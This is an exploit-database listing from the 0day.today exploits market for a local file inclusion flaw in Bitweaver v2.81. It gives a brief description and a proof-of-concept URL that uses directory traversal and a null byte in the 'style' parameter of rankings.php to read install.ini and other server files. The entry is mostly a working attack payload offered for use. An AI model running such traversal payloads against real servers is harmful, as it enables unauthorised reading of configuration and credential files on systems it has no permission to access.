[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bitweaver v2.81 Local File Inclusion Vulnerability

Author
i2sec
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-17587
Category
web applications
Date add
27-02-2012
Platform
php
# Exploit Title: Bitweaver v2.81 LFI exploit
# Date: 27.02.2012
# Author: I2sec-PJH
# Software Link: http://sourceforge.net/projects/bitweaver/files/bitweaver2.x/bitweaver2.8.1.zip/download
# Version: v2.81
# Tested on: windows xp
------------------------------------------------------
-Description
LFI vulnerability in version 2.81 is available
ini files can be read when entering and various other extension produces spit tpl files.
-PoC
http://localhost/wiki/rankings.php?style=../../../../../../../../install.ini%00



#  0day.today [2024-10-05]  #